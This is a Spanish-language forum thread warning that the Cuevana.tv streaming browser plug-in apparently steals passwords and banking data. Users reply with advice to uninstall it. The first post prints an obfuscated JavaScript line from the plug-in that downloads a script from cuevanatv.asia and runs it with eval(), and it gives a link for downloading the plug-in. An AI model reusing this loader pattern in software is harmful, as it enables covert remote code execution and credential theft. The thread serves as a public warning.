El plug-in de CUEVANA.TV ROBA DATOS Y CONTRASEÑAS de los usuarios

  • Iniciador del tema Iniciador del tema X-MEN2
  • Start date Start date
X

X-MEN2

Invitado
El plug-in de CUEVANA.TV ROBA DATOS Y CONTRASEÑAS de los usuarios « Galactic Cow
Cuevana.tv, la conocida web de visionado online usada por varios millones de personas ha sido reportada como una web de “phising” (robo de datos sensibles) al detectar que el plugin que utiliza para supuestamente hacer streaming de los contenidos, contiene codigo malicioso utilizado para robar tus datos de redes sociales como Facebook e incluso de sitios de banca online como Banco Santander, Paypal y otros servicios de pago generalmente latinoamericanos.

Al parecer, al intentar visionar contenido de su sitio, éste pide autorización para instalar un complemento (plugin) para tu navegador (tanto firefox como chrome).
Este complemento aparentemente inofensivo resulta tener escondido en su código un script que contacta con el sitio web http://cuevanatv.asia que contiene codigos en JavaScript para efectuar el robo de tus datos personales cada vez que rellenas un formulario en un sitio de confianza.
Se recomienda encarecidamente a todas las personas que alguna vez hayan visitado este conocido portal de streaming que revisen sus navegadores y eliminen el plugin “Cuevana Streaming”.
Despues de este procedimiento es obligatorio cambiar todas tus claves que hayan podido ser interceptadas por este script malicioso.
Si deseas investigar el plugin, solo necesitas descargarlo desde hxxp://www.cuevana.tv/player/plugins/cstream-4.2.xpi y extraerlo con un descompresor de archivos (WinRar, 7Zip…), despues abre el archivo “script-compiler.js” que encontrarás en la carpeta “content”.
Una vez abierto ese archivo observa la linea número 232.
Código:
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 0=7 5();0.4(\'1\',\'2://3.8/h.9?\'+g.e(),d);0.a(b);c(0.f);',18,18,'r|GET|http|cuevanatv|open|XMLHttpRequest|var|new|asia|js|send|null|eval|false|random|responseText|Math|back3'.split('|'),0,{}))

En ella se encuentra este fragmento de código que lanza una petición hacia la web http://cuevanatv.asia que es la que captura los datos personales.
Muchos usuarios ya estan haciendo eco de la noticia bajo los hashtag #Cuevana , #CuevanaRoba y #PluginCuevana

https://twitter.com/i/#!/search/?q=cuevana&src=typd
=======

Nota: por seguridad siempre me dio temor instalar el plugin pues aparecía una aviso de Firefox y a tenía problemas con algunos antivirus. Solo en una ocasión utilicé Cuevana y no funcionó para ver una serie de tv, no cargaba. Así que para los usuarios a desinstalar el plugin.
 
Que madre!! yo instale esa madre y uso paypal y compro mucho en amazon... voy a borrarlo de una.
 
Yo nunca instalo plug-ins o barras "útiles" de ningún sitio. Esos plug-ins "necesarios para ver contenido" lo único que hacen es rastrear lo que usted hace en internet, interceptar su e-mail para llenarlo de spam o en el peor de los casos, las claves de correos, bancos y sitios sociales.

En el menos peor de los casos, las claves las usan para meterse a su correo, bancos, etc. para sacar datos de mercadeo y ver cuáles son sus preferencias y comportamientos. En el peor de los casos, termina con las cuentas secuestradas para mandar spam o vaciarle la cuenta del banco.

Los únicos plug-ins que tengo instalados en la compu son Java, Shockwave, Flash y pare de contar. Yo me largo inmediatamente de cualquier sitio que me pida un plug-in para ver contenido.
 
A mi nunca me dió confianza ese sitio ni sus plug-ins. Prefiero quedarme sin ver peliculas antes de que me dejen la cuenta en ceros o se jalen alguna otra torta.
 
Yo nunca instalo plug-ins o barras "útiles" de ningún sitio. Esos plug-ins "necesarios para ver contenido" lo único que hacen es rastrear lo que usted hace en internet, interceptar su e-mail para llenarlo de spam o en el peor de los casos, las claves de correos, bancos y sitios sociales.

En el menos peor de los casos, las claves las usan para meterse a su correo, bancos, etc. para sacar datos de mercadeo y ver cuáles son sus preferencias y comportamientos. En el peor de los casos, termina con las cuentas secuestradas para mandar spam o vaciarle la cuenta del banco.

Los únicos plug-ins que tengo instalados en la compu son Java, Shockwave, Flash y pare de contar. Yo me largo inmediatamente de cualquier sitio que me pida un plug-in para ver contenido.

Nada mas que agregar, muy completo.
 
Solo afecto a personas del 1 - 16 de septiembre que descargaron en este momento el pugin y que usaban firefox los demas estan bien y aun si estan entre estas personas no quiere decir que realmente les robaron algo pero si fuera asi nada mas cambinen las claves de los cosas importantes como de las cuentas paypal y amazon y ebay y ya :-)
 
Yo solo una vez lo instalé porque Firefox anunciaba que no era seguro. Y eso hace mucho tiempo. No usé el servicio porque se cortaban las películas y había que esperar mucho.

En Netflix hay que instalar Silverlight pero es un plugin de Microsoft parecido a flash.
 
Que lástima tuve que desinstalarlo, pero si le había encontrado bastante utilidad para ver series de vez en cuando. Para ver películas había que dejarlas cargando un gran rato porque si no se pegaba todo, descargaba entre 30 y 40 KB/s y tengo capacidad para descargar hasta 256 KB/s efectivos (tengo 2 Mb)
 

Nuevos temas

Últimas Noticias de Costa Rica

📑 Evite Incurrir en Multas y Sanciones: Ofrecemos servicios de presentación de declaraciones de IVA (D104), alquileres (D125) y la anual de renta (D101)

🦉Prepración para examenes desde 6to hasta Bachillerato por madurez.
¡Obtenga su título!

¿Está a favor de la portación de armas para la defensa personal?

  • Sí, para garantizar la seguridad individual

  • No, para reducir el riesgo de incidentes violentos


Los resultados solo son visibles tras votar.

TicosLand is now also available on Android and iOS

¿Las universidades públicas costarricenses son refugios de ideologías extremistas?

  • Sí, son una cueva de profesores parásitos

    Votos: 360 59,1%
  • No, son cunas del libre pensamiento

    Votos: 249 40,9%

¿Apoya la creación de una ley de eutanasia en Costa Rica?

  • Sí, por el derecho a una muerte digna

  • No, por el respeto absoluto a la vida


Los resultados solo son visibles tras votar.

En tendencia

¿Costa Rica debería promover abiertamente el turismo sexual?

  • Sí, podría dar un impulso económico

  • No, debido a las implicaciones morales y sociales negativas


Los resultados solo son visibles tras votar.

🚀 FACTURATica.com la #1 sin Mensualidades ni Anualidades. Inscripción gratis en Hacienda.

¿Estaría de acuerdo en la pena de muerte para crímenes graves y flagrantes?

  • Sí y también para la corrupción

  • No, por el riesgo de errores judiciales y la ética de la vida


Los resultados solo son visibles tras votar.

¿Debería Costa Rica legalizar la marihuana para uso recreativo?

  • Sí, por los beneficios económicos y de seguridad

  • No, debido a los potenciales riesgos para la salud y la sociedad


Los resultados solo son visibles tras votar.
Atrás
Arriba